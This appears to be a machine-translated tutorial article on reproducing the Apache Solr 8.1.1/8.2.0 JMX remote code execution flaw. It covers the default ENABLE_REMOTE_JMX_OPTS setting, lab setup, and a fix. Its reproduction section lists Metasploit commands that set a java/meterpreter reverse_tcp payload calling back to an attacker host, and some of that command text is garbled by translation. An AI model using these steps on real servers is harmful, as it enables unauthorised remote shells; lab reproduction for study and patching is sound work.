Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to reproduce RCE vulnerabilities in Apache Solr JMX services. The content of the article is of high quality, so the editor will share it with you for reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Introduction to 0x00

Solr is an independent enterprise search application server that provides an API interface similar to Web-service. Users can submit a certain format of XML file to the search engine server through http request to generate an index, or they can make a search request through Http Get operation and get the return result in XML format.

The flaw is due to a security risk to the ENABLE_REMOTE_JMX_OPTS configuration option in the default configuration file solr.in.sh.

The ENABLE_REMOTE_JMX_OPTS= "true" option exists in the native configuration file solr.in.sh of versions 8.1.1 and 8.2.0 of Apache Solr.

If you use the default solr.in.sh file from the affected version, JMX monitoring is enabled and exposed on the RMI_PORT (default = 18983)

And no authentication is required. If inbound traffic in the firewall opens this port, anyone with network access to the Solr node will be able to access the JMX

And can upload malicious code to execute on the Solr server. This vulnerability does not affect users of Windows systems, but only some versions of Linux users.

0x01 affects version

Launch time of Apache Solr8.1.1 version: 2019-05-28

Launch time of Apache Solr8.2.0 version: 2019-07-25

0x02 vulnerability harm

If the victim uses this default configuration, the JMX service is enabled on the default port 18983, and authentication is not enabled by default. Any attacker with access to this port can exploit this vulnerability to attack the affected service and execute arbitrary code.

0x03 environment building

Java environment and kali system, Solr 8.20

Download address for Solr 8.20:

Wget http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

Use unzip solr-8.2.0.zip to decompress

When the decompression is complete, change to the bin directory to start Solr

. / solr start-force

Access after startup: http://192.168.10.176:8983/

Recurrence of 0x04 vulnerabilities

Attack plane: kali IP:192.168.10.147

Injured machine: docker IP:192.168.10.184:8983 in Ubuntu18.6

1. After using nmap scan port, it is found that port 18983 is open.

2. Use exploit/multi/misc/java_jmx_server module in Metasploit to reproduce vulnerabilities.

Dead use exploit/multi/misc/java_jmx_server

@ set RHOST 192.168.10.184

@ set RPORT 18983

Let's set payload:java/meterpreter/reverse_tcp.

Dead set payload java/meterpreter/reverse_tcp

@ set LHOST 192.168.10.147

@ set LPORT 4444

3. If you execute using run, you can see that the connection has been established successfully.

0x05 repair recommendation

Set the ENABLE_REMOTE_JMX_OPTS option in the solr.in.sh configuration file to false, and then restart the Solr service.

On how to reproduce Apache Solr JMX services RCE vulnerabilities to share here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.